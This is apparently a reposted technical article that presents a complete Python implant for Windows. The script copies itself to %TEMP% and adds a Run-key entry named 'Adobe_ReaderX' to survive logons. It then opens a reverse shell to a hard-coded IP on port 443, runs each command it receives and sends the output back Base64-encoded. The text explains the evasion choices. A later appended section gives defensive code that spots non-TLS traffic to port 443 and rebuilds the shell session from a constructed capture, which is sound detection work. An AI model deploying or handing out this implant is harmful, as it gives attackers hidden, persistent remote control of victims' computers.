Create a Persistent Windows Reverse Shell with Python (Registry Run Key)

This article demonstrates how to use Python to copy a malicious executable to the %TEMP% directory, add a value under the Windows registry Run key for persistence, and establish a reverse shell, with Base64-encoded command output, that connects back to a hard-coded attacker IP, illustrating common Windows malware techniques.

ITPUB

Malware often achieves persistence on Windows by adding a value under HKLM\Software\Microsoft\Windows\CurrentVersion\Run: each value's data is a command line that Explorer launches whenever any user logs on (the HKCU counterpart applies only to the current user and, unlike HKLM, can be written without administrative rights). The following Python script copies an executable to the %TEMP% folder and adds a Run-key entry so the payload runs at every logon.

import sys, base64, os, shutil, socket, subprocess
from winreg import *   # the original targeted Python 2 (_winreg); this version runs on Python 3 for Windows

def autorun(tempdir, fileName, run):
    # Copy the running executable into %TEMP%; the Run value written below assumes
    # the copy is called mw.exe, i.e. that the script has been compiled to mw.exe
    shutil.copy(fileName, os.path.expandvars(tempdir))
    # Enumerate the names of the values already present under the Run key
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey = []
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)   # (name, data, type); raises OSError past the last value
            runkey.append(subkey[0])
            i += 1
    except OSError:
        pass
    key.Close()
    # Add our autorun entry if it is not already there
    if 'Adobe_ReaderX' not in runkey:
        try:
            # Writing under HKLM needs administrative rights; without them OpenKey raises
            # PermissionError, which the except OSError below silently swallows
            key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS)
            # REG_EXPAND_SZ is the value type for data that contains %VAR% references
            SetValueEx(key, 'Adobe_ReaderX', 0, REG_EXPAND_SZ, r"%TEMP%\mw.exe")
            key.Close()
        except OSError:
            pass

def shell():
    # Reverse shell over plain TCP to a hard-coded address; port 443 is chosen to look like
    # HTTPS, but nothing here is encrypted: only the command output is Base64-encoded
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.1', 443))
    s.send(b'[*] Connection Established!')
    while True:
        data = s.recv(1024)
        if not data:                 # empty read: the operator closed the connection
            break
        cmd = data.decode(errors='replace').strip()   # drop the newline a netcat operator sends
        if cmd == "quit":
            break
        proc = subprocess.Popen(cmd, shell=True,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE,
                                stdin=subprocess.PIPE)
        out, err = proc.communicate()   # drain both pipes without deadlocking on a full buffer
        s.send(base64.b64encode(out + err))
    s.close()

def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]   # the running script, or the executable when compiled (e.g. with py2exe)
    run = r"Software\Microsoft\Windows\CurrentVersion\Run"   # raw string: single backslashes only
    autorun(tempdir, fileName, run)
    shell()

if __name__ == "__main__":
    main()

The autorun function copies the running program to %TEMP%, enumerates the names of the existing Run-key values and, if none is called Adobe_ReaderX, creates a value of that name whose data is %TEMP%\mw.exe; the vendor-like name is chosen to pass a casual glance in msconfig or Autoruns. Because the value lives under HKLM, the write only succeeds when the script runs with administrative rights, and the script swallows the error otherwise. The shell function opens a plaintext TCP connection to the hard-coded address 192.168.56.1 on port 443, receives commands, runs each through the command interpreter (shell=True) and returns the combined stdout and stderr Base64-encoded. Port 443 is picked to blend in with HTTPS and the encoding defeats naive string matching, but the session is neither TLS nor encrypted, so anyone inspecting the stream can recover the output with a single Base64 decode.

When the program is executed, it registers itself under the Run key so that Windows starts the payload at every logon, and the reverse shell connects back to a listener such as netcat waiting on 192.168.56.1:443. The accompanying screenshot shows the program running on a Windows host and the Base64-encoded network traffic.
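The network side of the same session, added as an example that is not part of the original article: the shell above connects to port 443 but never performs a TLS handshake, so the first victim-to-attacker segment is the plaintext banner rather than a TLS ClientHello, and every later victim segment is Base64 that an analyst can decode to rebuild the command transcript. The captured flows below (one from the article's shell, one truncated TLS opener for comparison) are constructed for the example.

```python
import base64, binascii

BANNER = b"[*] Connection Established!"   # first bytes the article's shell sends after connecting
HTTPS_PORT = 443

# Constructed capture of one session: (direction, TCP payload) in arrival order
SHELL_FLOW = [
    ("victim->c2", BANNER),
    ("c2->victim", b"whoami\n"),
    ("victim->c2", base64.b64encode(b"win10-lab\\alice\r\n")),
    ("c2->victim", b"quit\n"),
]

# Constructed, truncated first segment of a genuine TLS session: record header + ClientHello type
TLS_FLOW = [
    ("victim->c2", bytes.fromhex("1603010005" "01")),
]


def is_tls_client_hello(b):
    """TLS record: type 0x16 (handshake), version 0x03xx, 2-byte length, then handshake type 0x01."""
    return len(b) >= 6 and b[0] == 0x16 and b[1] == 0x03 and b[5] == 0x01


def decode_output(payload):
    """The shell sends b64encode(stdout + stderr) with no framing; reject anything that is not Base64."""
    try:
        return base64.b64decode(payload, validate=True)
    except (binascii.Error, ValueError):
        return None


def analyse_flow(dst_port, flow):
    """Classify a flow and rebuild the command/output transcript of the article's shell."""
    reasons, transcript = [], []
    first = next((p for d, p in flow if d == "victim->c2"), b"")
    if is_tls_client_hello(first):
        return {"reasons": reasons, "transcript": transcript}   # genuine TLS: nothing to read here
    if dst_port == HTTPS_PORT:
        reasons.append("non-TLS traffic to 443")
    if first.startswith(BANNER):
        reasons.append("reverse shell banner")
    pending = None                                # last operator command still awaiting its output
    for direction, payload in flow:
        if direction == "c2->victim":
            pending = payload.decode(errors="replace").strip()
        elif pending is not None:                 # the banner precedes any command and is skipped
            output = decode_output(payload)
            if output is not None:
                transcript.append((pending, output.decode(errors="replace")))
            pending = None
    return {"reasons": reasons, "transcript": transcript}


if __name__ == "__main__":
    print(analyse_flow(443, SHELL_FLOW))
    print(analyse_flow(443, TLS_FLOW))
```

The "non-TLS traffic to 443" check is the more durable of the two signals: the banner string is trivial for an attacker to change, whereas a flow to 443 whose first client bytes are not a TLS record stands out regardless of what the payload says.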

Tags: Persistence, Windows, Registry, reverse shell
Written by ITPUB, the official ITPUB account sharing technical insights, community news, and events.